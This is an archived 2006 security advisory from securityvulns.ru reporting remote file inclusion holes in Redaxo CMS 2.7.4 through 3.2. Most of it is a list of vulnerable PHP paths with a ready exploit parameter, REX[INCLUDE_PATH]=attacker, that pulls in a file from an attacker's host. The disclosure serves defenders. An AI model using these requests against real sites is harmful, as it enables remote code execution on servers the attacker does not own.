Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  ashnews v0.
83(pathtoashnews)
- Remote File Include Vulnerabilities

  Igloo 0.1.9 and prior [(text_wiki mod)] - Remote File Include Vulnerabilities

  Informium 0.12.0 - Remote File Include Vulnerabilities

  [DRUPAL-SA-2006-008] Drupal 4.6.8 / 4.7.2 fixes XSS issue

From:beford <xbefordx_(at)_gmail.com>
Date:03.06.2006
Subject:Redaxo CMS <= 3.2 Remote File Include

Script: Redaxo CMS
Vendor: http://www.redaxo.de
Discovered: beford <xbefordx gmail com>

Redaxo 3.2 - 3.1 - 3.0

./redaxo/include/addons/image_resize/pages/index.inc.
php?REX[INCLUDE_PATH]=attacker

Redaxo 3.0

./redaxo3_0_demos_patched/redaxo/include/addons/image_resize/pages/index.inc.
php?subpage=relations&REX[INCLUDE_PATH]=attacker
./redaxo3_0_demos_patched/redaxo/include/addons/simple_user/pages/index.inc.
php?REX[INCLUDE_PATH]=attacker
./redaxo3_0_demos_patched/redaxo/include/addons/stats/pages/index.inc.
php?REX[INCLUDE_PATH]=attacker

Redaxo 2.7.4

./redaxo/include/addons/import_export/pages/index.inc.
php?REX[INCLUDE_PATH]=attacker
./redaxo/include/pages/community.inc.
php?subpage=newsletter&REX[INCLUDE_PATH]=attacker

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru